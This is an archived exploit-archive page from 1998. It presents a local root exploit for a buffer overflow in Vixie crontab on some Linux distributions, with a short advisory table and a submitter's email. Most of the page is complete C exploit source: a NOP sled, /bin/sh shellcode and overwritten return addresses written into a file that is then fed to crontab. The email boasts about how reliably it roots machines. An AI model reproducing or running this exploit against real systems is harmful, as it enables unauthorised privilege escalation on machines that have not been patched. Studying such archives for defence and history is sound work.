Overflow in Vixie crontab
Description: | standard overflow |
Author: | Dave G. wrote the exploit |
Compromise: | root (local) |
Vulnerable Systems: | Some RedHat distributions, a German distribution DLD 5.2, etc. Anyone running vulnerable version of Vixie crontab. |
Date: | 10 May 1998 (actually it is an older problem) |
Date: Sun, 10 May 1998 22:40:57 PDT
From: <[cut]@hotmail.com>
To: fyodor@nmap.org
Subject: Linux Oldie but Goodie
hi fyodor,
here's another one for Linux systems using mr. paul vixie's crontab ...
works not only on some redhats, but also on DLD 5.2 (a german linux
distribution) and many others using the vixie crontab - usually gets you
root on about 70 machines out of 100 ;)
cya,
[cut]
--------------snip--------------
/* vixie crontab buffer overflow for RedHat Linux
*
* I dont think too many people know that redhat uses vixie crontab.
* I didn't find this, just exploited it.
*
*
* Dave G.
* <daveg@escape.com>
* http://www.escape.com/~daveg
*
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#define DEFAULT_OFFSET -1240
#define BUFFER_SIZE 100 /* MAX_TEMPSTR is 100 */
#define HAPPY_FILE "./Window"
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main(int argc, char **argv)
{
int fd;
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
/*
* The sscanf line reads for 'name' as %[^ =]. Neither a space, nor
* a '=' character appears below
*/
int i;
int ofs = DEFAULT_OFFSET;
/* if we have a argument, use it as offset, else use default */
if(argc == 2)
ofs = atoi(argv[1]);
else if (argc > 2) {
fprintf(stderr, "egg [offset]\n");
exit(-1);
}
/* print the offset in use */
printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (878/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr++ = '=';
*ptr++ = 'X';
*ptr++ = '\n';
*ptr = 0;
printf("Writing to %s\n", HAPPY_FILE);
fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
write (fd, buff, strlen(buff));
close(fd);
execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL);
/* Successful completion */
exit(0);
}
--------------snip--------------
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: